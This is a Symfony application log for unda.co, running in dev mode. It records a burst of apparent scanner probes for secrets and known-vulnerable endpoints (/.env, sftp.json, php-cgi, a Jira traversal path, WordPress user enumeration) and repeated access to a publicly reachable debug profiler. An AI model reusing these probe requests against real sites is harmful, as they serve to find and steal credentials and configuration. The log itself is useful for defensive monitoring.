[2025-12-18 16:29:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wiki"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wiki\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:36:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b0d4a4","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/b0d4a4?panel=logger","method":"GET"} []
[2025-12-18 16:36:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-18 16:36:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3e8aaa","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/3e8aaa?panel=config","method":"GET"} []
[2025-12-18 16:36:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-18 16:45:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3e8aaa","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/3e8aaa?panel=cache","method":"GET"} []
[2025-12-18 16:45:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-18 16:47:52] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-18 16:47:54] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-18 16:47:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:47:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:47:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:47:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql/api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql/api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:47:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=66.249.66.45&limit=10","method":"GET"} []
[2025-12-18 16:47:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=66.249.66.45&limit=10","method":"GET"} []
[2025-12-18 16:47:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/gql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/gql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:48:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:48:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:48:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:48:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webjars/swagger-ui/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webjars/swagger-ui/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:48:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:48:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/v1/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/v1/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:48:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:48:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v3/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v3/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:48:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api-docs/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api-docs/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:48:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:48:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /@vite/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /@vite/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:48:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:48:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /php-cgi/php-cgi.exe"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /php-cgi/php-cgi.exe\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:48:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:48:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:48:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /about"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /about\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:48:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /debug/default/view"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /debug/default/view\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:48:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/_catalog"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/_catalog\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:48:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:48:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server-status"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server-status\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:48:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login.action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login.action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:48:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_all_dbs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_all_dbs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:48:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.DS_Store"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.DS_Store\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:48:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:48:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:48:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:48:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /telescope/requests"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /telescope/requests\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:48:46] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?rest_route=%2Fwp%2Fv2%2Fusers%2F","method":"GET"} []
[2025-12-18 16:50:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"411235","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/411235?panel=validator","method":"GET"} []
[2025-12-18 16:50:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-18 16:53:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3e8aaa","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/3e8aaa","method":"GET"} []
[2025-12-18 16:53:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-18 16:54:29] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-18 16:56:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b2689b","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b2689b?panel=dump","method":"GET"} []
[2025-12-18 16:56:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-18 17:00:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a2a520","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a2a520?panel=exception","method":"GET"} []
[2025-12-18 17:00:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-18 17:01:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c8bec6","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c8bec6","method":"GET"} []
[2025-12-18 17:01:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-18 17:02:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"30fc6c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/30fc6c?panel=security","method":"GET"} []
[2025-12-18 17:02:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-18 17:13:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"61c5a3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/61c5a3?panel=config","method":"GET"} []
[2025-12-18 17:13:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-18 17:22:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"55fc44","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/55fc44?panel=router","method":"GET"} []
